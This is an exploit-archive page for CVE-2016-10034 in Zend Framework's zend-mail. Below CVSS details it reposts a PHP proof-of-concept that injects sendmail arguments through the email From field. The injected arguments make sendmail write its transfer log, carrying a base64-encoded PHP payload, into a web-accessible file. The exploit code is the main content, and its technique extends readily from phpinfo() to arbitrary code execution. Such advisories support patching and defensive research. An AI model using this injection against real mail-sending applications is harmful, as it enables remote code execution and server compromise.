Zend Framework / zend-mail < 2.4.11 Remote Code Execution Exploit

2016.12.31

Credit: Dawid Golunski

Risk: High

Local: No

Remote: Yes

CVE: CVE-2016-10034

CWE: CWE-77

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

<?php
/*
Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11
zend-mail < 2.7.2
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
$email_from = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");
// ------------------
// mail() param injection via the vulnerability in zend-mail
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';
ZendLoaderAutoloaderFactory::factory(array(
'ZendLoaderStandardAutoloader' => array(
'autoregister_zf' => true
)
));
ZendMvcApplication::init(require 'config/application.php')->run();
$message = new ZendMailMessage();
$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');
$transport = new ZendMailTransportSendmail();
$transport->send($message);
?>

References:

https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html

https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Zend Framework / zend-mail < 2.4.11 Remote Code Execution Exploit

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.